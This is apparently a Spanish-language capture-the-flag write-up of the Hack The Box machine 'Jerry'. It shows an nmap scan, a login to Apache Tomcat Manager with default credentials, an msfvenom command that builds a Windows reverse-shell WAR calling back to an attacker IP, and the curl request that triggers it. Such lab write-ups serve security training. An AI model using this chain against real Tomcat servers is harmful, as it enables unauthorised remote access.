Inicio Jerry - HTB Writeup
Entrada
Cancelar

Jerry - HTB Writeup

Jerry es una máquina de dificultad Easy en la plataforma Hack The Box

En esta máquina, vamos a explotar una vulnerabilidad en el servicio Apache, que se encuentra disponible en el puerto 8080

Reconocimiento

Como siempre, utilizaremos la herramienta nmap para identificar los puertos abiertos en la máquina víctima:

1
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.95 -oG allPorts

img

En la máquina, esta abierto solamente el puerto 8080. Si introducimos la URL en el navegador junto con el puerto, podemos ver lo siguiente:

img

Podemos loguearnos en el servicio Apache Tomcat con las credenciales predeterminadas tomcat:s3cret:

img

Vemos que hay una sección donde podemos subir archivos .war , la cual usaremos para conseguir acceso al sistema:

img

Web Aplication Resource Files

Un archivo WAR, es un formato de archivo utilizado para empaquetar y distribuir aplicaciones web en la plataforma Java. Contiene todos los recursos necesarios para ejecutar una aplicación web en un solo archivo comprimido.

Explotación

Utilizaremos la herramienta msfvenom para crear una reverse shell en windows y poder acceder mediante nc:

1
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=443 -f war > rev_shell.war

img

Además, debemos saber el nombre del archivo .jsp para activarla con la herramienta curl. Para ello, utilizaremos jar para enumerar el contenido del archivo .war:

img

Ahora subiremos la reverse shell mediante la web utilizando curl, y nos pondremos en escucha en otra terminal mediante nc:

1
curl http://10.10.10.95:8000/rev_shell/mdeonxmbgy.jsp

img

De esta manera, ya tendremos acceso completo a la máquina víctima, donde podremos encontrar las flags en el Desktop del usuario administrator

Espero que os haya gustado y servido, cualquier comentario es de mucha ayuda. Adios!

Esta entrada está licenciada bajo CC BY 4.0 por el autor.